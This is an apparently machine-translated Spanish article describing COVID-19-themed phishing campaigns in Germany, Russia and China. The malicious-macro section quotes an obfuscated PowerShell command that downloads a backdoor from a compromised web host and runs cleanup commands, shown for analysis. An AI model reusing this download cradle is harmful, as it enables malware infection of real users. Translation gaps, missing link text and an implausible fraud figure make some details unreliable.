Los atacantes continúan explotando el tema COVID-19, creando cada vez más amenazas para los usuarios que están muy interesados en todo lo relacionado con la epidemia. EN Ya hemos hablado de los tipos de malware que aparecieron tras el coronavirus, y hoy hablaremos de las técnicas de ingeniería social con las que ya se han encontrado usuarios de diferentes países, incluida Rusia. Las tendencias y ejemplos generales están bajo corte.
recuerda en Hablamos de que la gente está dispuesta a leer no sólo sobre el coronavirus y el curso de la epidemia, sino también sobre las medidas de apoyo financiero. He aquí un buen ejemplo. Un interesante ataque de phishing fue descubierto en el estado alemán de Renania del Norte-Westfalia o NRW. Los atacantes crearon copias del sitio web del Ministerio de Economía (), donde cualquiera puede solicitar asistencia financiera. Un programa de este tipo existe realmente y resultó beneficioso para los estafadores. Habiendo recibido los datos personales de sus víctimas, presentaron una solicitud en el sitio web real del ministerio, pero indicaron otros datos bancarios. Según datos oficiales, hasta que se descubrió el plan se realizaron 4 solicitudes falsas de este tipo. Como resultado, 109 millones de dólares destinados a los ciudadanos afectados cayeron en manos de estafadores.
¿Quieres una prueba gratuita de COVID-19?
Otro ejemplo significativo de phishing con temática de coronavirus fue en correos electrónicos. Los mensajes atrajeron la atención de los usuarios con la oferta de someterse a pruebas gratuitas de detección de coronavirus. En el adjunto de estos hubo casos de Trickbot/Qakbot/Qbot. Y cuando quienes deseaban comprobar su salud comenzaron a "completar el formulario adjunto", se descargó un script malicioso en su computadora. Y para evitar las pruebas de sandboxing, el script comenzó a descargar el virus principal sólo después de un tiempo, cuando los sistemas de protección estaban convencidos de que no se produciría ninguna actividad maliciosa.
También fue fácil convencer a la mayoría de los usuarios para que habilitaran las macros. Para hacer esto, se utilizó un truco estándar: para completar el cuestionario, primero debe habilitar las macros, lo que significa ejecutar un script VBA.
Como puede ver, el script VBA está especialmente enmascarado contra los antivirus.
Windows tiene una función de espera donde la aplicación espera /T <segundos> antes de aceptar la respuesta predeterminada "Sí". En nuestro caso, el script esperó 65 segundos antes de eliminar los archivos temporales:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Y mientras esperaba, se descargó malware. Para esto se lanzó un script de PowerShell especial:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Después de decodificar el valor Base64, el script de PowerShell descarga la puerta trasera ubicada en el servidor web previamente pirateado de Alemania:
http://automatischer-staubsauger.com/feature/777777.pngy lo guarda con el nombre:
C:UsersPublictmpdirfile1.exe
Carpeta ‘C:UsersPublictmpdir’ se elimina al ejecutar el archivo 'tmps1.bat' que contiene el comando cmd /c mkdir ""C:UsersPublictmpdir"".
Ataque dirigido a agencias gubernamentales
Además, los analistas de FireEye informaron recientemente de un ataque APT32 dirigido a estructuras gubernamentales en Wuhan, así como al Ministerio de Gestión de Emergencias de China. Uno de los RTF distribuidos contenía un enlace a un artículo del New York Times titulado . Sin embargo, al leerlo, se descargó malware (los analistas de FireEye identificaron la instancia como METALJACK).
Curiosamente, en el momento de la detección, ninguno de los antivirus detectó esta instancia, según Virustotal.
Cuando los sitios web oficiales están caídos
El ejemplo más sorprendente de un ataque de phishing ocurrió en Rusia el otro día. El motivo fue el nombramiento de una prestación tan esperada para niños de 3 a 16 años. Cuando se anunció el inicio de la aceptación de solicitudes el 12 de mayo de 2020, millones de personas acudieron al sitio web de Servicios del Estado en busca de la ayuda tan esperada y derribaron el portal no peor que un ataque DDoS profesional. Cuando el presidente dijo que “los servicios gubernamentales no podían hacer frente al flujo de solicitudes”, la gente empezó a hablar en línea sobre el lanzamiento de un sitio alternativo para aceptar solicitudes.
El problema es que varios sitios comenzaron a funcionar a la vez, y aunque uno, el real en posobie16.gosuslugi.ru, acepta solicitudes, otros .
Los colegas de SearchInform encontraron alrededor de 30 nuevos dominios fraudulentos en la zona .ru. Infosecurity y Softline Company han rastreado más de 70 sitios web falsos similares de servicios gubernamentales desde principios de abril. Sus creadores manipulan símbolos familiares y también utilizan combinaciones de las palabras gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, etc.
Exageración e ingeniería social
Todos estos ejemplos no hacen más que confirmar que los atacantes están monetizando con éxito el tema del coronavirus. Y cuanto mayor es la tensión social y los temas menos claros, más posibilidades tienen los estafadores de robar datos importantes, obligar a las personas a renunciar a su dinero por su cuenta o simplemente piratear más computadoras.
Y dado que la pandemia ha obligado a personas potencialmente no preparadas a trabajar desde casa en masa, no sólo los datos personales, sino también los corporativos están en riesgo. Por ejemplo, recientemente los usuarios de Microsoft 365 (anteriormente Office 365) también fueron objeto de un ataque de phishing. La gente recibía mensajes de voz masivos “perdidos” como archivos adjuntos a cartas. Sin embargo, los archivos eran en realidad una página HTML que enviaba a las víctimas del ataque a . Como resultado, pérdida de acceso y compromiso de todos los datos de la cuenta.
Fuente: habr.com